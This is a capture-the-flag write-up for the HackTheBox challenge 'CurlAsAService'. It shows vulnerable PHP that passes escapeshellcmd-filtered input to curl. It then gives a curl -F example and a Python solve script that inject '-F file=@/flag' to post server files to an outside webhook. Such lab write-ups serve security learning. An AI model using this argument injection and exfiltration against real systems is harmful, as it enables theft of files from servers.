CurlAsAService
CurlAsAService is a PHP chalenge on Hackthebox
Description:
In this challenge we have an input that takes a url and pass it to curl command and retrieves the output back,
the problem is we can use arguments injection to trigger an LFI vulnerability.
Source code:
zip password: hackthebox
Vulnerable code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
class CommandModel
{
public function __construct($url)
{
echo $url ."\n";
echo escapeshellcmd($url) ."\n";
$this->command = "curl --proto =http,https -sSL " . escapeshellcmd($url) . " 2>&1";
echo $this->command . "\n";
}
public function exec()
{
$output = shell_exec($this->command);
return $output;
}
}
As you can see here, it uses escapeshellcmd to escape characters like ; | && etc.. .
but since it passes out input to CURL arguments we can treat CURL to send us any file in the system.
example:
1
curl -F file=path/to/file http://<your webhook> # this url will receive a post request with the file
Solve:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
import requests
def solve(webhook, file_path):
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
data = {
'ip': f"-F file=@{file_path} {webhook}".encode('utf-8')
}
try:
res = requests.post('http://localhost:1337/api/curl', headers=headers, data=data)
if res.status_code == 200:
print("Check you web hook if the file exist you'll find it there")
else:
print("Failed to resolve")
print(res.status_code, res.text)
except requests.exceptions as e:
print(e)
if __name__ == '__main__':
webhook = 'https://webhook.site/<webhook-uid>' # change this with your webhook url
file_path = '/flag' # here put your target file path
solve(webhook, file_path)
This post is licensed under CC BY 4.0 by the author.